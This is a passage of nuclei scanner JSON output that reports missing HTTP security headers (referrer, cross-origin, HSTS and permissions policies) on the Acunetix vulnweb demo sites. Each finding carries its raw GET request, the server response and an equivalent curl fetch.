vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/forgotpw\",\"path\":\"/forgotpw\",\"matched-at\":\"http://testhtml5.vulnweb.com/forgotpw\",\"request\":\"GET /forgotpw HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.330757659Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"path\":\"/ajax/archive\",\"matched-at\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"request\":\"GET /ajax/archive HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 2\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n[]\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.458577284Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/samples\",\"path\":\"/samples\",\"matched-at\":\"http://testhtml5.vulnweb.com/samples\",\"request\":\"GET /samples HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\n\\u003chead\\u003e\\n \\u003ctitle\\u003ePython samples\\u003c/title\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n \\u003ch3\\u003eSimple python programs:\\u003c/h3\\u003e\\n \\u003cul\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eFirst sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eSecond sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.45862375Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries\",\"path\":\"/CVS/Entries\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries\",\"request\":\"GET /CVS/Entries HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.458637204Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.588318602Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:50.716224036Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable 